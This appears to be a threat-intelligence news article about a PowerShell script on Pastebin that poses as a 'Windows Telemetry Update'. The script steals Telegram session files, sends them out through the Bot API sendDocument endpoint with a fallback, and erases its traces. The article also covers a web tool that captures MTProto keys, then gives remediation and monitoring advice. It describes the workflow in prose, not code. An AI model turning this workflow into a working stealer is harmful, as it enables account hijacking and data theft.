Cybersecurity researchers have uncovered a sophisticated PowerShell script hosted on Pastebin, meticulously designed to steal Telegram session data from both desktop and web-based clients. This alarming discovery highlights a growing threat where attackers leverage seemingly innocuous platforms to distribute potent malware disguised as routine system updates. The “Windows Telemetry Update,” as the malicious script is deceptively named, aims to trick users into executing it, thereby compromising their sensitive communication data.
The script’s functionality goes beyond simple data theft. According to analysis by Flare, threat actors are actively developing and refining these tools, with evidence suggesting a functional web-based session capture tool that shares infrastructure with the desktop stealer. This indicates a progression from experimentation to potentially scalable operations, posing a significant risk to individuals and organizations relying on Telegram for communication.
How the Script Steals Your Telegram Session
The infection chain is initiated when a victim manually executes the disguised PowerShell file. Once activated, the “Windows Telemetry Update” script immediately begins its illicit activities. It first gathers essential host metadata, including the user’s username, computer name, and public IP address. This information is typically collected by querying services like api.ipify[.]org.
Following the metadata collection, the script pivots to its primary objective: targeting Telegram session files. It specifically searches for directories associated with Telegram Desktop and its beta version, located typically under the %APPDATA% path. The script then locates and archives the crucial session files into a compressed file named “diag.zip.” This archive is temporarily stored within the user’s TEMP folder.
Flare analysts highlighted that the script operates with a dual approach, targeting both desktop session data and utilizing the Telegram Bot API for exfiltration. Furthermore, it shares infrastructure with a separate tool designed to capture web-based Telegram sessions. This dual functionality makes the threat more comprehensive, impacting users across different Telegram interfaces.
The discovery of two versions of the script on Pastebin provides a rare glimpse into the development lifecycle of such malicious tools. The initial version (v1) encountered issues with its upload implementation, failing to send the “diag.zip” archive to the operator. The operator, observing this failure, addressed the flaw and released a corrected version (v2). This corrected variant successfully implements the sendDocument endpoint using the Invoke-RestMethod-Form approach with proper multipart/form-data encoding, demonstrating a clear debugging and refinement process.
It is noteworthy that neither version of the script employs obfuscation techniques or includes persistence mechanisms. Additionally, there is no automated delivery or execution method evident. Based on the analysis, the script appeared to still be in a validation phase at the time of its discovery, rather than being deployed in a widespread campaign. However, the existence of a functional v2 variant and the shared bot infrastructure with the web-based stealer suggest that this capability has passed initial testing and could be scaled for broader deployment.
The script’s methodology for exfiltrating the compromised data is detailed. After collecting and compressing the session files, the script attempts to send the “diag.zip” archive to the attacker via the Telegram Bot API, specifically using the api.telegram.org/bot{token}/sendDocument endpoint. Victim metadata is included as a caption. In the event this primary method fails, a WebClient UploadFile fallback mechanism ensures the archive is still sent, albeit without the caption.
To further obscure its tracks, the script meticulously deletes the “diag.zip” file from the victim’s disk immediately after the upload is completed. This action is intended to remove forensic evidence that could link the activity back to the attacker. Meanwhile, the separate web-based stealer component focuses on capturing active Telegram Web localStorage session states, particularly MTProto authorization keys and account session structures. Possession of these keys allows an attacker to reconstruct authenticated sessions without needing the account’s password or SMS verification, significantly compromising account security.
Security professionals and Telegram users should take immediate action if they suspect this script may have been executed on their systems. It is crucial to terminate all active Telegram sessions by navigating to Settings > Privacy and Security > Active Sessions and selecting “Terminate All Other Sessions.” Following this, users should change their Telegram password and enable two-factor authentication if it is not already active.
Furthermore, a thorough review of the Telegram account for any unauthorized activity, unexpected sent messages, or altered settings is recommended. Users should also consider the possibility that any sensitive information previously shared via Telegram may have been exposed and take appropriate steps to secure related accounts or notify affected parties. From a network security perspective, blocking the domains api.telegram.org and web.telegram.org at the proxy and firewall layer can offer protection, especially in environments where Telegram usage is restricted.
For organizations where Telegram is permitted, heightened network monitoring is advised. Security teams should watch for sendDocument and sendMessage API calls originating from scripting environments such as PowerShell, Python, or curl. Such calls are uncommon in legitimate enterprise operations and warrant immediate investigation. The ongoing development of such tools underscores the need for continuous vigilance and adaptation in cybersecurity defenses to counter evolving threat landscapes, particularly concerning popular communication platforms like Telegram and the exploitation of readily available platforms like Pastebin for malware distribution.